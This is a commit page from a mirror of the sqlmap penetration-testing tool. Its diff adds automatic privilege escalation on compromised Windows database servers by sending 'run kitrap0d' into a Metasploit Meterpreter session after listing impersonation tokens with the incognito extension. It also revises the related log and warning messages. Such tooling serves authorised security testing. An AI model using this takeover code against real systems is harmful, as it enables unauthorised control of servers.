sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-25 11:03:47 +03:00
Code Issues Packages Projects Releases Wiki Activity

run kitrap0d script along with listing Windows Impersonation Tokens via meterpreter's incognito extension when --priv-esc is provided (see #149).

Browse Source
This commit is contained in:
Bernardo Damele 2010-01-26 01:14:44 +00:00
parent a97e20d8e1
commit 6437c16156
2 changed files with 14 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
lib/takeover/metasploit.py
View File

@ -187,9 +187,10 @@ class Metasploit:
def __selectPayload(self, askChurrasco=True): def __selectPayload(self, askChurrasco=True):
if kb.os == "Windows" and conf.privEsc: if kb.os == "Windows" and conf.privEsc:
infoMsg = "forcing Metasploit payload to Meterpreter because " infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg += "it is the only payload that can abuse Windows " infoMsg += "it is the only payload that can be used to "
infoMsg += "Access Tokens via Meterpreter 'incognito' " infoMsg += "escalate privileges, either via 'incognito' "
infoMsg += "extension to privilege escalate" infoMsg += "extension or via 'kitrap0d' script, "
infoMsg += "http://tinyurl.com/kitrap0d for details"
logger.info(infoMsg) logger.info(infoMsg)
__payloadStr = "windows/meterpreter" __payloadStr = "windows/meterpreter"
@ -458,6 +459,12 @@ class Metasploit:
proc.stdin.write("list_tokens -u\n") proc.stdin.write("list_tokens -u\n")
infoMsg = "trying also to escalate privileges using "
infoMsg += "kitrap0d script"
logger.info(infoMsg)
proc.stdin.write("run kitrap0d\n")
def __controlMsfCmd(self, proc, func): def __controlMsfCmd(self, proc, func):
stdin_fd = sys.stdin.fileno() stdin_fd = sys.stdin.fileno()
setNonBlocking(stdin_fd) setNonBlocking(stdin_fd)

7
plugins/generic/takeover.py
View File

@ -165,15 +165,16 @@ class Takeover(Abstraction, Metasploit, Registry):
warnMsg = "by default PostgreSQL on Windows runs as postgres " warnMsg = "by default PostgreSQL on Windows runs as postgres "
warnMsg += "user which has no Windows Impersonation " warnMsg += "user which has no Windows Impersonation "
warnMsg += "Tokens: it is unlikely that the privilege " warnMsg += "Tokens: it is unlikely that the privilege "
warnMsg += "escalation will be successful" warnMsg += "escalation via 'incognito' extension will "
warnMsg += "be successful"
logger.warn(warnMsg) logger.warn(warnMsg)
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ): elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0] warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
warnMsg += "runs as Network Service which has no Windows " warnMsg += "runs as Network Service which has no Windows "
warnMsg += "Impersonation Tokens within all threads, this " warnMsg += "Impersonation Tokens within all threads, this "
warnMsg += "makes Meterpreter's incognito extension to " warnMsg += "makes Meterpreter's 'incognito' extension "
warnMsg += "fail to list tokens" warnMsg += "to fail to list tokens"
logger.warn(warnMsg) logger.warn(warnMsg)
uploaded = self.uploadChurrasco() uploaded = self.uploadChurrasco()